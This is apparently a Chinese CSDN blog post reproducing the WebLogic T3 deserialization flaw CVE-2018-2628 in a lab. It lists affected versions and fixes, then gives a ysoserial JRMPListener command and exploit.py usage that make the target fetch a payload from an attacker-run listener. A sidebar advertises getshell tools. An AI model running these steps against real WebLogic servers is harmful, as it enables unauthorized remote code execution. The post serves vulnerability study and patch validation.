Weblogic反序列化命令执行漏洞(CVE-2018-2628)

最新推荐文章于 2024-05-12 12:57:15 发布
最新推荐文章于 2024-05-12 12:57:15 发布
阅读量646 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq115399231/article/details/97239170
版权

漏洞介绍

此漏洞产生于Weblogic T3服务,当开放Weblogic控制台端口(默认为7001端口)时,T3服务会默认开启,因此会造成较大影响。
影响版本:10.3.6.0 ,12.1.3.0 , 12.2.1.2, 12.2.1.3
修复方案
1.控制T3协议的访问权限临时阻断漏洞利用
2.打上Oracle官方发布的4月份补丁

复现环境

靶机:weblogic192.168.162.130:7001
攻击机:192.168.31.22

漏洞利用

使用ysoserial启动一个JRMP Server(ysoserial下载地址
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
参数:[listen port]是JRMP Server 监听的端口,[Command]是想要执行命令

在这里插入图片描述
使用exp向目标发送数据包。(脚本链接
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

参数
[victim ip] :目标IP
[victim port] : 目标端口
[path to ysoserial] : ysoserial的路径
[JRMPListener ip] : 部署ysoserial的IP
[JRMPClient] :这里使用的是JRMPClient类

在这里插入图片描述

xu@ubuntu:~/Desktop/未命名文件夹$ docker exec -ti 0c8c95562531 /bin/bash
root@0c8c95562531:~/Oracle/Middleware# ls

ceshi.txt成功创建

在这里插入图片描述

爱玩爱睡爱学习
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic序列远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
漏洞复现|Weblogic序列命令执行漏洞(CVE-2018-2628)
weixin_42282189的博客
10-28 1373
作者:村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 NVD:Oracle 中间件的 Oracle WebLogic Server 组件(子组件:WLS 核心组件)中的漏洞漏洞允许未经身份验证的攻击者通过 T3 访问网络来破坏 Oracle WebLogic Server。 0x02 影响范围 10.3.6.0、12.1.3.0、12.2.1.2 和 12.2.1.3。 0x03 环境准备 vulhub靶场环境:CVE-2018-2628 0x0.
weblogic 序列 CVE-2018-2628
最新发布
npc88888的博客
05-12 790
Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。
Weblogic序列漏洞CVE-2018-2628)
weixin_41182861的博客
09-25 834
漏洞简述 在 Weblogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成序列远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。 漏洞编号:CVE-2017-10271 影响版本:10.3.6.0.0、12.1.3.0、12.2.1.1和12.2.1.2 测试环境:Linux || vulhub |
Java序列漏洞之——weblogic序列漏洞CVE-2018-2628)
Stephen Wolf
12-10 1190
一、Java 序列序列 Java 序列是指把 Java 对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列。 Java 序列是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类的 readObject() 方法用于序列序列序列是...
漏洞通告】Weblogic 序列远程代码执行高危漏洞 (CVE-2018-2628)
高效运维
04-20 4926
Oracle官方发布了4月份的关键补丁更新CPU(Critical Patch Update),其中包含一个高危的远程代码执行漏洞(CVE-2018-2628),通过该漏...
Weblogic序列远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic序列远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Weblogic序列远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic序列远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic序列漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
详述WebLogic序列远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
Enmotech的博客
05-28 2400
各位亲爱的用户/读者朋友们:为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了《云和恩墨技术通讯》(5月刊),通过对过去一段时间的知识回顾和故障...
ysoserial-v0.0.4
05-04
java序列工具ysoserial最新版v0.0.4 (jenkins,weblogic,jboss等的代码执行利用工具)
weblogic_exploit:weblogic突破利用工具
03-13
weblogic_exploit weblogic的利用漏洞工具请立即获取iTunes CVE_2015_4852 CVE_2016_0638 CVE_2016_3510 CVE_2017_10271 CVE_2017_3248 CVE_2018_2628 CVE_2018_2893 CVE_2018_2894 CVE_2018_3252 CVE_2018_3191 CVE_2018_3245 CVE_2019_2725 CVE_2019_2729 CVE_2020_2551 CVE_2020_2555支持突破回显,不支持的是使用dnslog进行判断编译后的jar地址
java序列漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 弹shell部分更完美,不再加载远程war包,直接发包完成弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
WebLogic CVE-2018-2628漏洞
06-13
先安装CVE-2017-10271 漏洞补丁,在打 CVE-2018-2628 补丁
weblogicCVE-2018-2628批量检测工具
05-08
weblogic-CVE-2018-2628-序列漏洞批量验证脚本。优多线程检测。具备漏洞发现功能。
Weblogic序列漏洞复现(CVE-2018-2628)
DaWan
09-21 988
Weblogic序列漏洞(CVE-2018-2628环境搭建工具准备漏洞复现 环境搭建 使用vulhub进行环境搭建,具体的步骤可以自行百度 工具准备 下载ysoserial,为了启动JRMP Server EXP地址:https://www.exploit-db.com/exploits/44553 漏洞复现 使用namp查看是否启用T3协议: nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161 启动JRMP Se
Weblogic WLS Core Components 序列命令执行漏洞CVE-2018-2628)
EC_Carrot的博客
08-18 480
漏洞简介 Oracle WebLogic Server中的WLS核心组件存在远程代码执行漏洞。攻击者可通过远程发送攻击数据,借助T3协议在WebLogic Server中执行序列操作利用该漏洞执行代码。 影响范围 Oracle WebLogic Server 10.3.6.0版本,12.1.3.0 版本,12.2.1.2 版本,12.2.1.3版本。 漏洞复现 首先下载ysoserial,并启动一个JRMP Server: java -cp ysoserial.jar ysoserial.exploit
Weblogic WLS Core Components 序列命令执行漏洞 CVE-2018-2628 漏洞复现
ADummy的博客
03-01 287
Weblogic WLS Core Components 序列命令执行漏洞CVE-2018-2628) by ADummy 0x00利用路线 ​ 启动一个JRMP Server—>执行exp文件—>命令执行 0x01漏洞介绍 ​ 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成序列远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻
以下Weblogic漏洞序列的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞序列的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的序列漏洞是一种常见的安全漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值